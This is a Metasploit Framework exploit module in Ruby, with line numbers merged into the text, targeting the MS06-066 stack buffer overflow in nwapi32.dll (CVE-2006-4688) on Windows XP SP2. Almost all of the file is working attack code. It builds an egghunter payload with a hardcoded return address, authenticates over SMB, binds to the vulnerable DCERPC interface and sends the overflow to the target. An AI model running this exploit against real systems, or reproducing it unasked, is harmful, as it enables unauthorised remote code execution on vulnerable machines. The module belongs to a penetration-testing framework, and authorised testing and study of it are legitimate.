Path: blob/master/modules/exploits/windows/smb/ms06_066_nwapi.rb
19591 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::Egghunter9include Msf::Exploit::Remote::DCERPC10include Msf::Exploit::Remote::SMB::Client1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'MS06-066 Microsoft Services nwapi32.dll Module Exploit',17'Description' => %q{18This module exploits a stack buffer overflow in the svchost service when the netware19client service is running. This specific vulnerability is in the nwapi32.dll module.20},21'Author' => [ 'pusscat' ],22'License' => MSF_LICENSE,23'References' => [24[ 'CVE', '2006-4688'],25[ 'OSVDB', '30260'],26[ 'BID', '21023'],27[ 'MSB', 'MS06-066'],2829],30'DefaultOptions' => {31'EXITFUNC' => 'thread',32},33'Privileged' => true,34'Payload' => {35'Space' => 296,36'BadChars' => "",37'Compat' =>38{39# -ws2ord XXX?40},41'StackAdjustment' => -3500,42},43'Platform' => 'win',44'Targets' => [45[46'Windows XP SP2',47{48'Ret' => 0x00EBEEEC,49},50]51],52'DefaultTarget' => 0,53'DisclosureDate' => '2006-11-14',54'Notes' => {55'Reliability' => UNKNOWN_RELIABILITY,56'Stability' => UNKNOWN_STABILITY,57'SideEffects' => UNKNOWN_SIDE_EFFECTS58}59)60)6162register_options(63[64OptString.new('SMBPIPE', [ true, "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'srvsvc']),65]66)67end6869def exploit70# [in] [unique] wchar *71# [in] wchar *72# [in, out] long73# [out] handle7475# Generate the egghunter payload76hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })77egg = hunter[1]78# print_status("Today, we'll be hunting for 0x#{egg.unpack("V")[0]}")7980# Add giant blocks of guard data before and after the egg81eggdata =82rand_text(1024) +83egg +84rand_text(1024)8586buflen = 29587ofstring = Rex::Text.to_unicode('\\\\') + "\x90" + hunter[0] + rand_text(buflen - hunter[0].length) +88[ target.ret ].pack('V') + "\x00"89# ofstring = Rex::Text.to_unicode('\\\\') + payload.encoded + [ target.ret ].pack('V') + "\x00\x00"9091stubdata =92NDR.long(rand(0xffffffff)) +93NDR.UnicodeConformantVaryingString("\\\\BBBB") +94NDR.UnicodeConformantVaryingStringPreBuilt(ofstring) + # HERE!95# NDR.UnicodeConformantVaryingString('\\\\' + "A"*1024 + "\x00") +96NDR.long(rand(0xffffffff)) +97NDR.long(rand(0xffffffff)) +98# NDR.long((ofstring.length * 2) + 0xC) +99eggdata100101print_status("Connecting to the SMB service...")102connect()103smb_login()104105handle = dcerpc_handle('e67ab081-9844-3521-9d32-834f038001c0', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])106print_status("Binding to #{handle} ...")107dcerpc_bind(handle)108print_status("Bound to #{handle} ...")109110print_status("Calling the vulnerable function...")111112begin113dcerpc.call(0x09, stubdata)114rescue Rex::Proto::DCERPC::Exceptions::NoResponse115print_status('Server did not respond, this is expected')116rescue => e117if e.to_s =~ /STATUS_PIPE_DISCONNECTED/118print_status('Server disconnected, this is expected')119else120raise e121end122else123print_status("Got #{dcerpc.last_response.stub_data.length} bytes: #{dcerpc.last_response.stub_data}")124end125126# Cleanup127handler128disconnect129130if (dcerpc.last_response != nil and131dcerpc.last_response.stub_data != nil and132dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00")133return true134else135return false136end137end138end139140141